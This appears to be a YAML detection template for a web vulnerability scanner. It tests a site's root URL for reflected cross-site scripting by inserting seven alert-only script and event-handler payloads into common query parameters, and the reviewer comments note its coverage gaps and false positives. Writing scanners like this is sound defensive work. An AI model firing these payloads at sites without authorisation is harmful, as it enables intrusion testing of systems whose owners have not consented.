sif/modules/http/xss-reflected.yaml
2026-01-03 05:57:10 -08:00


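# Reflected XSS Detection Module
#
# Requests each listed path with each payload substituted into a query
# parameter, and reports a hit when one of the matcher words appears verbatim
# in the response body.
#
# NOTE(review): this listing lost its indentation, which leaves info/http/
# matcher keys at the document root. The nesting below is reconstructed from
# the key order - confirm against the repository copy.
id: xss-reflected

info:
  name: Reflected XSS Detection
  author: sif
  severity: medium
  description: Detects reflected Cross-Site Scripting vulnerabilities
  tags: [xss, injection, javascript, owasp-top10]

type: http

http:
  method: GET

  # Only the site root is probed, with six common parameter names; reflection
  # points on other routes or parameters are outside this module's coverage.
  # NOTE(review): the payloads contain spaces, quotes and angle brackets.
  # This assumes the engine URL-encodes the payload placeholder before
  # sending - confirm.
  paths:
    - "{{BaseURL}}/?q={{payload}}"
    - "{{BaseURL}}/?search={{payload}}"
    - "{{BaseURL}}/?name={{payload}}"
    - "{{BaseURL}}/?input={{payload}}"
    - "{{BaseURL}}/?message={{payload}}"
    - "{{BaseURL}}/?text={{payload}}"

  payloads:
    - "<script>alert('XSS')</script>"
    - "'><script>alert('XSS')</script>"
    - "\"><script>alert('XSS')</script>"
    - "<img src=x onerror=alert('XSS')>"
    - "<svg onload=alert('XSS')>"
    - "javascript:alert('XSS')"
    - "<body onload=alert('XSS')>"

  threads: 10

  matchers:
    # A verbatim echo shows the value came back without HTML encoding. It does
    # not show where it landed: a non-HTML response (JSON, text/plain) or an
    # echo inside a comment or <textarea> also matches, and so does a page
    # that already contains one of these strings. Treat a hit as a lead to
    # triage, not as a confirmed finding.
    # NOTE(review): the two quote-breakout payloads are covered through the
    # <script> word, but the javascript: and <body onload> payloads have no
    # corresponding word, so a reflection of only those goes unreported.
    - type: word
      part: body
      words:
        - "<script>alert('XSS')</script>"
        - "<img src=x onerror=alert('XSS')>"
        - "<svg onload=alert('XSS')>"
      # or: any single word in the body is enough to match.
      condition: or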